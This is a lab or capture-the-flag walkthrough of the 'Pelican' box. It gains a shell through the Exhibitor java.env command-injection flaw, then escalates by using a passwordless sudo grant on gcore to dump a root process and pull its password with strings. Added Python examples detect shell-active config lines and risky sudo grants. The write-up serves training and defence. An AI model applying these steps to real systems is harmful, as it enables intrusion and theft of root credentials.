Pelican

Intro

This box exposed many services for enumeration. Although we ran autorecon for this enumeration, most of its output is not covered in this walkthrough. Ultimately, identifying an RCE vulnerability in the Exhibitor application gave us initial access. Privilege escalation was achieved by using our limited sudo privileges to create a core dump of a sensitive process, which contained the root user's password.

Initial Foothold

We began by running an NMAP scan to identify exposed services and their versions.

# Nmap 7.94SVN scan initiated Fri Oct 25 09:19:14 2024 as: nmap -p- -sV -sC -vv -oA nmap/fulltcp pelican.pg
Nmap scan report for pelican.pg (192.168.167.98)
Host is up, received echo-reply ttl 61 (0.053s latency).
Scanned at 2024-10-25 09:19:14 CDT for 63s
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
|   256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
139/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp   open  ipp         syn-ack ttl 61 CUPS 2.2
|_http-server-header: CUPS/2.2 IPP/2.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Bad Request - CUPS v2.2.10
2181/tcp  open  zookeeper   syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp  open  ssh         syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
|   256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
8080/tcp  open  http        syn-ack ttl 61 Jetty 1.0
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(1.0)
8081/tcp  open  http        syn-ack ttl 61 nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://pelican.pg:8080/exhibitor/v1/ui/index.html
44267/tcp open  java-rmi    syn-ack ttl 61 Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-10-25T14:20:12
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 61403/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 55032/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 35856/udp): CLEAN (Timeout)
|   Check 4 (port 39528/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: pelican
|   NetBIOS computer name: PELICAN\x00
|   Domain name: \x00
|   FQDN: pelican
|_  System time: 2024-10-25T10:20:14-04:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 25 09:20:17 2024 -- 1 IP address (1 host up) scanned in 63.56 seconds

Reviewing the running services for known vulnerabilities, we identified a remote command execution vulnerability in the Exhibitor for ZooKeeper web application.

┌──(joe㉿kali)-[~]
└─$ searchsploit Exhibitor
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
Exhibitor Web UI 1.7.1 - Remote Code Execution         | java/webapps/48654.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

The Exhibitor application executes commands embedded in the 'java.env script' field when they are formatted with backticks or the $() notation. By supplying the desired command and committing the change, we caught a reverse shell as the user charles.

┌──(joe㉿kali)-[~/hax/pg/pelican]
└─$ nc -lvnp 8080     
listening on [any] 8080 ...
connect to [192.168.45.183] from (UNKNOWN) [192.168.167.98] 49776
whoami
charles
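The defensive counterpart to this bug, as an added example that is not from the original walkthrough or the Exhibitor project: a config field whose contents are later sourced by a shell must either reject shell-active syntax or be re-emitted with every value quoted. The function names and the JVMFLAGS sample are constructed for this example.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Syntax a POSIX shell expands when a file is sourced: command substitution,
# backticks, parameter expansion, and separators that start a second command.
SHELL_ACTIVE = re.compile(r'\$\(|`|\$\{|[;&|]')
ASSIGNMENT = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)=(.*)$')

def flag_unsafe_lines(script_text):
    """Lines that would do more than assign a variable if sourced verbatim."""
    return [(n, line) for n, line in enumerate(script_text.splitlines(), 1)
            if SHELL_ACTIVE.search(line)]

def render_env_script(script_text):
    """Accept only KEY=VALUE lines and single-quote every value, so the shell
    that later sources the file sees literal text and expands nothing."""
    out = []
    for line in script_text.splitlines():
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        m = ASSIGNMENT.match(line)
        if not m:
            raise ValueError(f'not a KEY=VALUE assignment: {line!r}')
        out.append(f'{m.group(1)}={shlex.quote(m.group(2).strip())}')
    return '\n'.join(out) + '\n'

def value_after_sourcing(script_text, key):
    """Source the script in /bin/sh and return the value the shell ends up
    holding for `key`, i.e. what a java.env consumer would actually see."""
    with tempfile.NamedTemporaryFile('w', suffix='.env', delete=False) as f:
        f.write(script_text)
        path = f.name
    try:
        cmd = f'. {shlex.quote(path)} && printf %s "${key}"'
        return subprocess.run(['/bin/sh', '-c', cmd], capture_output=True,
                              text=True, check=True).stdout
    finally:
        os.unlink(path)

# Constructed sample: a java.env body carrying a command substitution.
SAMPLE = 'JVMFLAGS=-Dtag=$(echo injected)\n'

if __name__ == '__main__':
    print(flag_unsafe_lines(SAMPLE))                                    # flagged
    print(value_after_sourcing(SAMPLE, 'JVMFLAGS'))                     # substitution ran
    print(value_after_sourcing(render_env_script(SAMPLE), 'JVMFLAGS'))  # literal text
```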

Privilege Escalation

We were able to list our sudo privileges without supplying charles' password, and identified that we had privileges to run the /usr/bin/gcore command.

charles@pelican:/opt/zookeeper$ sudo -l
sudo -l
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore

The gcore command creates core dumps of running processes. Running it as root lets us dump the memory of sensitive processes. Reviewing the process list, we can see that the root user is running the password-store process.

charles@pelican:/opt/zookeeper$ ps -aux | grep root | grep pass
ps -aux | grep root | grep pass
root       486  0.0  0.0   2276   140 ?        Ss   10:13   0:00 /usr/bin/password-store

We then produced a core dump of the password-store process with the gcore utility.

charles@pelican:/opt/zookeeper$ sudo /usr/bin/gcore 486
sudo /usr/bin/gcore 486
0x00007fddd67856f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffcf6253d00, remaining=remaining@entry=0x7ffcf6253d00) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28	../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.486
[Inferior 1 (process 486) detached]
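The defender's view of this step, as an added example that is not part of the original walkthrough: parse `sudo -l` output for passwordless grants on memory-reading tools, and turn sudo's auth.log entries for those tools into structured events a SIEM rule can key on. The function names, the sample `sudo -l` text and the log lines are constructed for this example.

```python
import re
from os.path import basename

# Tools that can read another process's memory or force it to dump core. Run
# as root they expose any secret a root process holds in RAM, as gcore did here.
MEMORY_READERS = {'gcore', 'gdb', 'strace', 'ltrace'}
# One grant line from `sudo -l`, e.g. "(ALL) NOPASSWD: /usr/bin/gcore".
GRANT_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$')
# The line sudo writes to auth.log/syslog for every invocation.
SUDO_LOG_RE = re.compile(
    r'sudo:\s+(?P<user>\S+)\s*:.*?USER=(?P<runas>\S+)\s*;\s*COMMAND=(?P<cmd>.+?)\s*$')

def risky_grants(sudo_l_output):
    """(runas, passwordless, command) for grants on memory-reading tools."""
    found = []
    for line in sudo_l_output.splitlines():
        m = GRANT_RE.match(line)
        if not m:
            continue
        path = m.group('cmd').split()[0]
        if basename(path) in MEMORY_READERS:
            found.append((m.group('runas'), 'NOPASSWD:' in m.group('tags'), path))
    return found

def memory_dump_events(log_lines):
    """auth.log entries where sudo ran a memory-reading tool, as dicts."""
    events = []
    for line in log_lines:
        m = SUDO_LOG_RE.search(line)
        if not m:
            continue
        argv = m.group('cmd').split()
        if basename(argv[0]) in MEMORY_READERS:
            events.append({'user': m.group('user'), 'runas': m.group('runas'),
                           'tool': basename(argv[0]), 'args': ' '.join(argv[1:])})
    return events

# Constructed samples in the formats `sudo -l` and sudo's log line use.
SAMPLE_SUDO_L = """\
User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore
    (root) /usr/bin/apt-get update
"""
SAMPLE_AUTH_LOG = [
    'Oct 25 10:15:01 pelican sudo:  charles : TTY=unknown ; PWD=/opt/zookeeper ; USER=root ; COMMAND=/usr/bin/gcore 486',
    'Oct 25 10:15:30 pelican sudo:  charles : TTY=pts/0 ; PWD=/home/charles ; USER=root ; COMMAND=/usr/bin/apt-get update',
    'Oct 25 10:16:02 pelican sudo:  charles : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/gdb -p 486',
]
```

Either signal alone is worth an alert; a NOPASSWD grant on one of these tools means a low-privilege account can read root process memory at will.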

Running strings on the core dump identified a potential password for the root user.

charles@pelican:/opt/zookeeper$ strings core.486 | grep -C 1 -i password
strings core.486 | grep -C 1 -i password
CORE
password-store
/usr/bin/password-store 
CORE
--
ELIFCORE
/usr/bin/password-store
/usr/bin/password-store
/usr/lib/x86_64-linux-gnu/libc-2.28.so
--
////////////////
001 Password: root:
ClogKingpinInning731
>A-x86_64
/usr/bin/password-store
HOME=/root
--
PWD=/root
/usr/bin/password-store
bemX

Using this password, we were able to su to the root user.

charles@pelican:/opt/zookeeper$ su root
su root
Password: ClogKingpinInning731

root@pelican:/opt/zookeeper#
